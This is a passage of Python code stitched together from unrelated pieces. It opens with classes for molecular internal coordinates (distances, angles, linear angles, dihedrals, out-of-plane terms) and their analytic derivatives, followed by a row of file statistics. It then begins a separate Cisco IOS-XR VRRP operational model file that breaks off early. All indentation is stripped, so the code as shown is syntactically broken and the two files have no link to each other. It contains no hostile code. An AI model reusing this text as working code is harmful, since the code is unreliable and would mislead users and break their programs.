__slots__=['a','x0','w','Rotator','isAngular','isPeriodic']
def __init__(self, a, x0, Rotators, w=1.0):
self.a = tuple(sorted(a))
self.x0 = x0
self.w = w
if self.a not in Rotators:
Rotators[self.a] = Rotator(self.a, x0)
self.Rotator = Rotators[self.a]
self.isAngular = True
self.isPeriodic = False
def __repr__(self):
# return "Rotation-C %s : Weight %.3f" % (' '.join([str(i+1) for i in self.a]), self.w)
return "Rotation-C %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
# if eq and np.sum((self.w-other.w)**2) > 1e-6:
# print "Warning: RotationC same atoms, different weights"
# if eq and np.sum((self.x0-other.x0)**2) > 1e-6:
# print "Warning: RotationC same atoms, different reference positions"
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
return self.Rotator.value(xyz)[2]*self.w
def derivative(self, xyz):
der_all = self.Rotator.derivative(xyz)
derivatives = der_all[:, :, 2]*self.w
return derivatives
class Distance(object):
__slots__=['a','b','isAngular','isPeriodic']
def __init__(self, a, b):
self.a = a
self.b = b
if a == b:
raise RuntimeError('a and b must be different')
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
return "Distance %i-%i" % (self.a+1, self.b+1)
@property
def atoms(self):
return [self.a,self.b]
def __eq__(self, other):
if type(self) is not type(other): return False
if self.a == other.a:
if self.b == other.b:
return True
if self.a == other.b:
if self.b == other.a:
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
return np.sqrt(np.sum((xyz[a]-xyz[b])**2))
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = self.a
n = self.b
u = (xyz[m] - xyz[n]) / np.linalg.norm(xyz[m] - xyz[n])
derivatives[m, :] = u
derivatives[n, :] = -u
return derivatives
class Angle(object):
__slots__=['a','b','c','isAngular','isPeriodic']
def __init__(self, a, b, c):
self.a = a
self.b = b
self.c = c
self.isAngular = True
self.isPeriodic = False
if len({a, b, c}) != 3:
raise RuntimeError('a, b, and c must be different')
def __repr__(self):
return "Angle %i-%i-%i" % (self.a+1, self.b+1, self.c+1)
@property
def atoms(self):
return [self.a,self.b,self.c]
def __eq__(self, other):
if type(self) is not type(other): return False
if self.b == other.b:
if self.a == other.a:
if self.c == other.c:
return True
if self.a == other.c:
if self.c == other.a:
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
# vector from first atom to central atom
vector1 = xyz[a] - xyz[b]
# vector from last atom to central atom
vector2 = xyz[c] - xyz[b]
# norm of the two vectors
norm1 = np.sqrt(np.sum(vector1**2))
norm2 = np.sqrt(np.sum(vector2**2))
dot = np.dot(vector1, vector2)
# Catch the edge case that very rarely this number is -1.
if dot / (norm1 * norm2) <= -1.0:
if (np.abs(dot / (norm1 * norm2)) + 1.0) < -1e-6:
raise RuntimeError('Encountered invalid value in angle')
return np.pi
if dot / (norm1 * norm2) >= 1.0:
if (np.abs(dot / (norm1 * norm2)) - 1.0) > 1e-6:
raise RuntimeError('Encountered invalid value in angle')
return 0.0
return np.arccos(dot / (norm1 * norm2))
def normal_vector(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
# vector from first atom to central atom
vector1 = xyz[a] - xyz[b]
# vector from last atom to central atom
vector2 = xyz[c] - xyz[b]
# norm of the two vectors
norm1 = np.sqrt(np.sum(vector1**2))
norm2 = np.sqrt(np.sum(vector2**2))
crs = np.cross(vector1, vector2)
crs /= np.linalg.norm(crs)
return crs
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = self.a
o = self.b
n = self.c
# Unit displacement vectors
u_prime = (xyz[m] - xyz[o])
u_norm = np.linalg.norm(u_prime)
v_prime = (xyz[n] - xyz[o])
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
v = v_prime / v_norm
VECTOR1 = np.array([1, -1, 1]) / np.sqrt(3)
VECTOR2 = np.array([-1, 1, 1]) / np.sqrt(3)
if np.linalg.norm(u + v) < 1e-10 or np.linalg.norm(u - v) < 1e-10:
# if they're parallel
if ((np.linalg.norm(u + VECTOR1) < 1e-10) or
(np.linalg.norm(u - VECTOR2) < 1e-10)):
# and they're parallel o [1, -1, 1]
w_prime = np.cross(u, VECTOR2)
else:
w_prime = np.cross(u, VECTOR1)
else:
w_prime = np.cross(u, v)
w = w_prime / np.linalg.norm(w_prime)
term1 = np.cross(u, w) / u_norm
term2 = np.cross(w, v) / v_norm
derivatives[m, :] = term1
derivatives[n, :] = term2
derivatives[o, :] = -(term1 + term2)
return derivatives
class LinearAngle(object):
__slots__=['a','b','c','axis','e0','stored_dot2','isAngular','isPeriodic']
def __init__(self, a, b, c, axis):
self.a = a
self.b = b
self.c = c
self.axis = axis
self.isAngular = False
self.isPeriodic = False
if len({a, b, c}) != 3:
raise RuntimeError('a, b, and c must be different')
self.e0 = None
self.stored_dot2 = 0.0
@property
def atoms(self):
return [self.a,self.b,self.c]
def reset(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
# Unit vector pointing from a to c.
v = xyz[c] - xyz[a]
ev = v / np.linalg.norm(v)
# Cartesian axes.
ex = np.array([1.0,0.0,0.0])
ey = np.array([0.0,1.0,0.0])
ez = np.array([0.0,0.0,1.0])
self.e0 = [ex, ey, ez][np.argmin([np.dot(i, ev)**2 for i in [ex, ey, ez]])]
self.stored_dot2 = 0.0
def __repr__(self):
return "LinearAngle%s %i-%i-%i" % (["X","Y"][self.axis], self.a+1, self.b+1, self.c+1)
def __eq__(self, other):
if not hasattr(other, 'axis'): return False
if self.axis is not other.axis: return False
if type(self) is not type(other): return False
if self.b == other.b:
if self.a == other.a:
if self.c == other.c:
return True
if self.a == other.c:
if self.c == other.a:
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
"""
This function measures the displacement of the BA and BC unit
vectors in the linear angle "ABC". The displacements are measured
along two axes that are perpendicular to the AC unit vector.
"""
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
# Unit vector pointing from a to c.
v = xyz[c] - xyz[a]
ev = v / np.linalg.norm(v)
if self.e0 is None: self.reset(xyz)
e0 = self.e0
self.stored_dot2 = np.dot(ev, e0)**2
# Now make two unit vectors that are perpendicular to this one.
c1 = np.cross(ev, e0)
e1 = c1 / np.linalg.norm(c1)
c2 = np.cross(ev, e1)
e2 = c2 / np.linalg.norm(c2)
# BA and BC unit vectors in ABC angle
vba = xyz[a]-xyz[b]
eba = vba / np.linalg.norm(vba)
vbc = xyz[c]-xyz[b]
ebc = vbc / np.linalg.norm(vbc)
if self.axis == 0:
answer = np.dot(eba, e1) + np.dot(ebc, e1)
else:
answer = np.dot(eba, e2) + np.dot(ebc, e2)
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
derivatives = np.zeros_like(xyz)
## Finite difference derivatives
## fderivatives = np.zeros_like(xyz)
## h = 1e-6
## for u in range(xyz.shape[0]):
## for v in range(3):
## xyz[u, v] += h
## vPlus = self.value(xyz)
## xyz[u, v] -= 2*h
## vMinus = self.value(xyz)
## xyz[u, v] += h
## fderivatives[u, v] = (vPlus-vMinus)/(2*h)
# Unit vector pointing from a to c.
v = xyz[c] - xyz[a]
ev = v / np.linalg.norm(v)
if self.e0 is None: self.reset(xyz)
e0 = self.e0
c1 = np.cross(ev, e0)
e1 = c1 / np.linalg.norm(c1)
c2 = np.cross(ev, e1)
e2 = c2 / np.linalg.norm(c2)
# BA and BC unit vectors in ABC angle
vba = xyz[a]-xyz[b]
eba = vba / np.linalg.norm(vba)
vbc = xyz[c]-xyz[b]
ebc = vbc / np.linalg.norm(vbc)
# Derivative terms
de0 = np.zeros((3, 3), dtype=float)
dev = d_unit_vector(v)
dc1 = d_cross_ab(ev, e0, dev, de0)
de1 = np.dot(dc1, d_unit_vector(c1))
dc2 = d_cross_ab(ev, e1, dev, de1)
de2 = np.dot(dc2, d_unit_vector(c2))
deba = d_unit_vector(vba)
debc = d_unit_vector(vbc)
if self.axis == 0:
derivatives[a, :] = np.dot(deba, e1) + np.dot(-de1, eba) + np.dot(-de1, ebc)
derivatives[b, :] = np.dot(-deba, e1) + np.dot(-debc, e1)
derivatives[c, :] = np.dot(de1, eba) + np.dot(de1, ebc) + np.dot(debc, e1)
else:
derivatives[a, :] = np.dot(deba, e2) + np.dot(-de2, eba) + np.dot(-de2, ebc)
derivatives[b, :] = np.dot(-deba, e2) + np.dot(-debc, e2)
derivatives[c, :] = np.dot(de2, eba) + np.dot(de2, ebc) + np.dot(debc, e2)
## Finite difference derivatives
## if np.linalg.norm(derivatives - fderivatives) > 1e-6:
## print np.linalg.norm(derivatives - fderivatives)
## raise Exception()
return derivatives
class MultiAngle(object):
__slots__=['a','b','c','isAngular','isPeriodic']
def __init__(self, a, b, c):
if type(a) is int:
a = (a,)
if type(c) is int:
c = (c,)
self.a = tuple(a)
self.b = b
self.c = tuple(c)
self.isAngular = True
self.isPeriodic = False
if len({a, b, c}) != 3:
raise RuntimeError('a, b, and c must be different')
def __repr__(self):
stra = ("("+','.join(["%i" % (i+1) for i in self.a])+")") if len(self.a) > 1 else "%i" % (self.a[0]+1)
strc = ("("+','.join(["%i" % (i+1) for i in self.c])+")") if len(self.c) > 1 else "%i" % (self.c[0]+1)
return "%sAngle %s-%i-%s" % ("Multi" if (len(self.a) > 1 or len(self.c) > 1) else "", stra, self.b+1, strc)
def __eq__(self, other):
if type(self) is not type(other): return False
if self.b == other.b:
if set(self.a) == set(other.a):
if set(self.c) == set(other.c):
return True
if set(self.a) == set(other.c):
if set(self.c) == set(other.a):
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
b = self.b
c = np.array(self.c)
xyza = np.mean(xyz[a], axis=0)
xyzc = np.mean(xyz[c], axis=0)
# vector from first atom to central atom
vector1 = xyza - xyz[b]
# vector from last atom to central atom
vector2 = xyzc - xyz[b]
# norm of the two vectors
norm1 = np.sqrt(np.sum(vector1**2))
norm2 = np.sqrt(np.sum(vector2**2))
dot = np.dot(vector1, vector2)
# Catch the edge case that very rarely this number is -1.
if dot / (norm1 * norm2) <= -1.0:
if (np.abs(dot / (norm1 * norm2)) + 1.0) < -1e-6:
raise RuntimeError('Encountered invalid value in angle')
return np.pi
return np.arccos(dot / (norm1 * norm2))
def normal_vector(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
b = self.b
c = np.array(self.c)
xyza = np.mean(xyz[a], axis=0)
xyzc = np.mean(xyz[c], axis=0)
# vector from first atom to central atom
vector1 = xyza - xyz[b]
# vector from last atom to central atom
vector2 = xyzc - xyz[b]
# norm of the two vectors
norm1 = np.sqrt(np.sum(vector1**2))
norm2 = np.sqrt(np.sum(vector2**2))
crs = np.cross(vector1, vector2)
crs /= np.linalg.norm(crs)
return crs
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = np.array(self.a)
o = self.b
n = np.array(self.c)
xyzm = np.mean(xyz[m], axis=0)
xyzn = np.mean(xyz[n], axis=0)
# Unit displacement vectors
u_prime = (xyzm - xyz[o])
u_norm = np.linalg.norm(u_prime)
v_prime = (xyzn - xyz[o])
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
v = v_prime / v_norm
VECTOR1 = np.array([1, -1, 1]) / np.sqrt(3)
VECTOR2 = np.array([-1, 1, 1]) / np.sqrt(3)
if np.linalg.norm(u + v) < 1e-10 or np.linalg.norm(u - v) < 1e-10:
# if they're parallel
if ((np.linalg.norm(u + VECTOR1) < 1e-10) or
(np.linalg.norm(u - VECTOR2) < 1e-10)):
# and they're parallel o [1, -1, 1]
w_prime = np.cross(u, VECTOR2)
else:
w_prime = np.cross(u, VECTOR1)
else:
w_prime = np.cross(u, v)
w = w_prime / np.linalg.norm(w_prime)
term1 = np.cross(u, w) / u_norm
term2 = np.cross(w, v) / v_norm
for i in m:
derivatives[i, :] = term1/len(m)
for i in n:
derivatives[i, :] = term2/len(n)
derivatives[o, :] = -(term1 + term2)
return derivatives
class Dihedral(object):
__slots__=['a','b','c','d','isAngular','isPeriodic']
def __init__(self, a, b, c, d):
self.a = a
self.b = b
self.c = c
self.d = d
self.isAngular = True
self.isPeriodic = True
if len({a, b, c, d}) != 4:
raise RuntimeError('a, b, c and d must be different')
def __repr__(self):
return "Dihedral %i-%i-%i-%i" % (self.a+1, self.b+1, self.c+1, self.d+1)
@property
def atoms(self):
return [self.a,self.b,self.c,self.d]
def __eq__(self, other):
if type(self) is not type(other): return False
if self.a == other.a:
if self.b == other.b:
if self.c == other.c:
if self.d == other.d:
return True
if self.a == other.d:
if self.b == other.c:
if self.c == other.b:
if self.d == other.a:
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
d = self.d
vec1 = xyz[b] - xyz[a]
vec2 = xyz[c] - xyz[b]
vec3 = xyz[d] - xyz[c]
cross1 = np.cross(vec2, vec3)
cross2 = np.cross(vec1, vec2)
arg1 = np.sum(np.multiply(vec1, cross1)) * \
np.sqrt(np.sum(vec2**2))
arg2 = np.sum(np.multiply(cross1, cross2))
answer = np.arctan2(arg1, arg2)
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = self.a
o = self.b
p = self.c
n = self.d
u_prime = (xyz[m] - xyz[o])
w_prime = (xyz[p] - xyz[o])
v_prime = (xyz[n] - xyz[p])
u_norm = np.linalg.norm(u_prime)
w_norm = np.linalg.norm(w_prime)
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
w = w_prime / w_norm
v = v_prime / v_norm
if (1 - np.dot(u, w)**2) < 1e-6:
term1 = np.cross(u, w) * 0
term3 = np.cross(u, w) * 0
else:
term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
if (1 - np.dot(v, w)**2) < 1e-6:
term2 = np.cross(v, w) * 0
term4 = np.cross(v, w) * 0
else:
term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
# term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
# term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
# term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
# term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
derivatives[m, :] = term1
derivatives[n, :] = -term2
derivatives[o, :] = -term1 + term3 - term4
derivatives[p, :] = term2 - term3 + term4
return derivatives
class MultiDihedral(object):
__slots__=['a','b','c','d','isAngular','isPeriodic']
def __init__(self, a, b, c, d):
if type(a) is int:
a = (a, )
if type(d) is int:
d = (d, )
self.a = tuple(a)
self.b = b
self.c = c
self.d = tuple(d)
self.isAngular = True
self.isPeriodic = True
if len({a, b, c, d}) != 4:
raise RuntimeError('a, b, c and d must be different')
def __repr__(self):
stra = ("("+','.join(["%i" % (i+1) for i in self.a])+")") if len(self.a) > 1 else "%i" % (self.a[0]+1)
strd = ("("+','.join(["%i" % (i+1) for i in self.d])+")") if len(self.d) > 1 else "%i" % (self.d[0]+1)
return "%sDihedral %s-%i-%i-%s" % ("Multi" if (len(self.a) > 1 or len(self.d) > 1) else "", stra, self.b+1, self.c+1, strd)
def __eq__(self, other):
if type(self) is not type(other): return False
if set(self.a) == set(other.a):
if self.b == other.b:
if self.c == other.c:
if set(self.d) == set(other.d):
return True
if set(self.a) == set(other.d):
if self.b == other.c:
if self.c == other.b:
if set(self.d) == set(other.a):
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
b = self.b
c = self.c
d = np.array(self.d)
xyza = np.mean(xyz[a], axis=0)
xyzd = np.mean(xyz[d], axis=0)
vec1 = xyz[b] - xyza
vec2 = xyz[c] - xyz[b]
vec3 = xyzd - xyz[c]
cross1 = np.cross(vec2, vec3)
cross2 = np.cross(vec1, vec2)
arg1 = np.sum(np.multiply(vec1, cross1)) * \
np.sqrt(np.sum(vec2**2))
arg2 = np.sum(np.multiply(cross1, cross2))
answer = np.arctan2(arg1, arg2)
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = np.array(self.a)
o = self.b
p = self.c
n = np.array(self.d)
xyzm = np.mean(xyz[m], axis=0)
xyzn = np.mean(xyz[n], axis=0)
u_prime = (xyzm - xyz[o])
w_prime = (xyz[p] - xyz[o])
v_prime = (xyzn - xyz[p])
u_norm = np.linalg.norm(u_prime)
w_norm = np.linalg.norm(w_prime)
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
w = w_prime / w_norm
v = v_prime / v_norm
if (1 - np.dot(u, w)**2) < 1e-6:
term1 = np.cross(u, w) * 0
term3 = np.cross(u, w) * 0
else:
term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
if (1 - np.dot(v, w)**2) < 1e-6:
term2 = np.cross(v, w) * 0
term4 = np.cross(v, w) * 0
else:
term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
# term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
# term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
# term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
# term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
for i in self.a:
derivatives[i, :] = term1/len(self.a)
for i in self.d:
derivatives[i, :] = -term2/len(self.d)
derivatives[o, :] = -term1 + term3 - term4
derivatives[p, :] = term2 - term3 + term4
return derivatives
class OutOfPlane(object):
__slots__=['a','b','c','d','isAngular','isPeriodic']
def __init__(self, a, b, c, d):
self.a = a
self.b = b
self.c = c
self.d = d
self.isAngular = True
self.isPeriodic = True
if len({a, b, c, d}) != 4:
raise RuntimeError('a, b, c and d must be different')
def __repr__(self):
return "Out-of-Plane %i-%i-%i-%i" % (self.a+1, self.b+1, self.c+1, self.d+1)
@property
def atoms(self):
return [self.a,self.b,self.c,self.d]
def __eq__(self, other):
if type(self) is not type(other): return False
if self.a == other.a:
if {self.b, self.c, self.d} == {other.b, other.c, other.d}:
if [self.b, self.c, self.d] != [other.b, other.c, other.d]:
logger.warning("Warning: OutOfPlane atoms are the same, ordering is different")
return True
# if self.b == other.b:
# if self.c == other.c:
# if self.d == other.d:
# return True
# if self.a == other.d:
# if self.b == other.c:
# if self.c == other.b:
# if self.d == other.a:
# return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
b = self.b
c = self.c
d = self.d
vec1 = xyz[b] - xyz[a]
vec2 = xyz[c] - xyz[b]
vec3 = xyz[d] - xyz[c]
cross1 = np.cross(vec2, vec3)
cross2 = np.cross(vec1, vec2)
arg1 = np.sum(np.multiply(vec1, cross1)) * \
np.sqrt(np.sum(vec2**2))
arg2 = np.sum(np.multiply(cross1, cross2))
answer = np.arctan2(arg1, arg2)
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
m = self.a
o = self.b
p = self.c
n = self.d
u_prime = (xyz[m] - xyz[o])
w_prime = (xyz[p] - xyz[o])
v_prime = (xyz[n] - xyz[p])
u_norm = np.linalg.norm(u_prime)
w_norm = np.linalg.norm(w_prime)
v_norm = np.linalg.norm(v_prime)
u = u_prime / u_norm
w = w_prime / w_norm
v = v_prime / v_norm
if (1 - np.dot(u, w)**2) < 1e-6:
term1 = np.cross(u, w) * 0
term3 = np.cross(u, w) * 0
else:
term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
if (1 - np.dot(v, w)**2) < 1e-6:
term2 = np.cross(v, w) * 0
term4 = np.cross(v, w) * 0
else:
term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
# term1 = np.cross(u, w) / (u_norm * (1 - np.dot(u, w)**2))
# term2 = np.cross(v, w) / (v_norm * (1 - np.dot(v, w)**2))
# term3 = np.cross(u, w) * np.dot(u, w) / (w_norm * (1 - np.dot(u, w)**2))
# term4 = np.cross(v, w) * np.dot(v, w) / (w_norm * (1 - np.dot(v, w)**2))
derivatives[m, :] = term1
derivatives[n, :] = -term2
derivatives[o, :] = -term1 + term3 - term4
derivatives[p, :] = term2 - term3 + term4
return derivatives
def logArray(mat, precision=3, fmt="f"):
fmt="%% .%i%s" % (precision, fmt)
if len(mat.shape) == 1:
for i in range(mat.shape[0]):
logger.info(fmt % mat[i]),
print()
elif len(mat.shape) == 2:
for i in range(mat.shape[0]):
for j in range(mat.shape[1]):
logger.info(fmt % mat[i,j]),
print()
else:
raise RuntimeError("One or two dimensional arrays only")
| 35.451827 | 131 | 0.508785 | 6,150 | 42,684 | 3.43122 | 0.055285 | 0.035779 | 0.029002 | 0.020567 | 0.827647 | 0.799735 | 0.76552 | 0.757416 | 0.73865 | 0.725998 | 0 | 0.02859 | 0.343618 | 42,684 | 1,203 | 132 | 35.481297 | 0.724596 | 0.132977 | 0 | 0.808623 | 0 | 0 | 0.043283 | 0 | 0 | 0 | 0 | 0 | 0.003155 | 1 | 0.125131 | false | 0 | 0.004206 | 0.04837 | 0.287066 | 0.002103 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cca5e7608c82d5573992854d59acccbfbcdd809e | 194,494 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_vrrp_oper.py | CiscoDevNet/ydk-py | 073731fea50694d0bc6cd8ebf10fec308dcc0aa9 | [
"ECL-2.0",
"Apache-2.0"
] | 177 | 2016-03-15T17:03:51.000Z | 2022-03-18T16:48:44.000Z | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_vrrp_oper.py | CiscoDevNet/ydk-py | 073731fea50694d0bc6cd8ebf10fec308dcc0aa9 | [
"ECL-2.0",
"Apache-2.0"
] | 18 | 2016-03-30T10:45:22.000Z | 2020-07-14T16:28:13.000Z | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_vrrp_oper.py | CiscoDevNet/ydk-py | 073731fea50694d0bc6cd8ebf10fec308dcc0aa9 | [
"ECL-2.0",
"Apache-2.0"
] | 85 | 2016-03-16T20:38:57.000Z | 2022-02-22T04:26:02.000Z | """ Cisco_IOS_XR_ipv4_vrrp_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR ipv4\-vrrp package operational data.
This module contains definitions
for the following management objects\:
vrrp\: VRRP operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class VrrpBAf(Enum):
"""
VrrpBAf (Enum Class)
Vrrp b af
.. data:: address_family_ipv4 = 0
IPv4 Address Family
.. data:: address_family_ipv6 = 1
IPv6 Address Family
.. data:: vrrp_baf_count = 2
Number of Adddress Families
"""
address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4")
address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6")
vrrp_baf_count = Enum.YLeaf(2, "vrrp-baf-count")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpBAf']
class VrrpBagProtocolState(Enum):
"""
VrrpBagProtocolState (Enum Class)
VRRP protocol state
.. data:: state_initial = 1
Initial
.. data:: state_backup = 2
Backup
.. data:: state_master = 3
Master
"""
state_initial = Enum.YLeaf(1, "state-initial")
state_backup = Enum.YLeaf(2, "state-backup")
state_master = Enum.YLeaf(3, "state-master")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpBagProtocolState']
class VrrpBfdSessionState(Enum):
"""
VrrpBfdSessionState (Enum Class)
Vrrp bfd session state
.. data:: bfd_state_none = 0
None
.. data:: bfd_state_inactive = 1
Inactive
.. data:: bfd_state_up = 2
Up
.. data:: bfd_state_down = 3
Down
"""
bfd_state_none = Enum.YLeaf(0, "bfd-state-none")
bfd_state_inactive = Enum.YLeaf(1, "bfd-state-inactive")
bfd_state_up = Enum.YLeaf(2, "bfd-state-up")
bfd_state_down = Enum.YLeaf(3, "bfd-state-down")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpBfdSessionState']
class VrrpProtAuth(Enum):
"""
VrrpProtAuth (Enum Class)
Vrrp prot auth
.. data:: authentication_none = 0
Down
.. data:: authentication_text = 1
Simple Text
.. data:: authentication_ip = 2
IP header
"""
authentication_none = Enum.YLeaf(0, "authentication-none")
authentication_text = Enum.YLeaf(1, "authentication-text")
authentication_ip = Enum.YLeaf(2, "authentication-ip")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpProtAuth']
class VrrpStateChangeReason(Enum):
"""
VrrpStateChangeReason (Enum Class)
Vrrp state change reason
.. data:: state_change_bfd_down = 0
BFD session down
.. data:: state_change_virtual_ip_configured = 1
Virtual IP configured
.. data:: state_change_interface_ip = 2
Interface IP update
.. data:: state_change_delay_timer = 3
Delay timer expired
.. data:: state_change_startup = 4
Ready on startup
.. data:: state_change_interface_up = 5
Interface Up update
.. data:: state_change_interface_down = 6
Interface Down update
.. data:: state_change_master_down_timer = 7
Master down timer expired
.. data:: state_change_higher_priority_master = 8
Higher priority advert received
.. data:: state_change_fhrp_admin = 9
FHRP Admin state change
.. data:: state_change_mgo_parent = 10
Change of MGO parent session
.. data:: state_change_chkpt_update = 11
Checkpoint update from Primary VRRP instance
.. data:: state_change_issu_resync = 12
Resync following ISSU primary event
"""
state_change_bfd_down = Enum.YLeaf(0, "state-change-bfd-down")
state_change_virtual_ip_configured = Enum.YLeaf(1, "state-change-virtual-ip-configured")
state_change_interface_ip = Enum.YLeaf(2, "state-change-interface-ip")
state_change_delay_timer = Enum.YLeaf(3, "state-change-delay-timer")
state_change_startup = Enum.YLeaf(4, "state-change-startup")
state_change_interface_up = Enum.YLeaf(5, "state-change-interface-up")
state_change_interface_down = Enum.YLeaf(6, "state-change-interface-down")
state_change_master_down_timer = Enum.YLeaf(7, "state-change-master-down-timer")
state_change_higher_priority_master = Enum.YLeaf(8, "state-change-higher-priority-master")
state_change_fhrp_admin = Enum.YLeaf(9, "state-change-fhrp-admin")
state_change_mgo_parent = Enum.YLeaf(10, "state-change-mgo-parent")
state_change_chkpt_update = Enum.YLeaf(11, "state-change-chkpt-update")
state_change_issu_resync = Enum.YLeaf(12, "state-change-issu-resync")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpStateChangeReason']
class VrrpVipState(Enum):
"""
VrrpVipState (Enum Class)
Vrrp vip state
.. data:: virtual_ip_state_down = 0
Down
.. data:: virtual_ip_state_up = 1
Up
"""
virtual_ip_state_down = Enum.YLeaf(0, "virtual-ip-state-down")
virtual_ip_state_up = Enum.YLeaf(1, "virtual-ip-state-up")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpVipState']
class VrrpVmacState(Enum):
"""
VrrpVmacState (Enum Class)
Vrrp vmac state
.. data:: stored = 0
VMAC stored locally
.. data:: reserved = 1
VMAC reserved in mac table
.. data:: active = 2
VMAC active in mac table
.. data:: reserving = 3
VMAC not yet reserved in mac table
"""
stored = Enum.YLeaf(0, "stored")
reserved = Enum.YLeaf(1, "reserved")
active = Enum.YLeaf(2, "active")
reserving = Enum.YLeaf(3, "reserving")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['VrrpVmacState']
class Vrrp(_Entity_):
"""
VRRP operational data
.. attribute:: summary
VRRP summary statistics
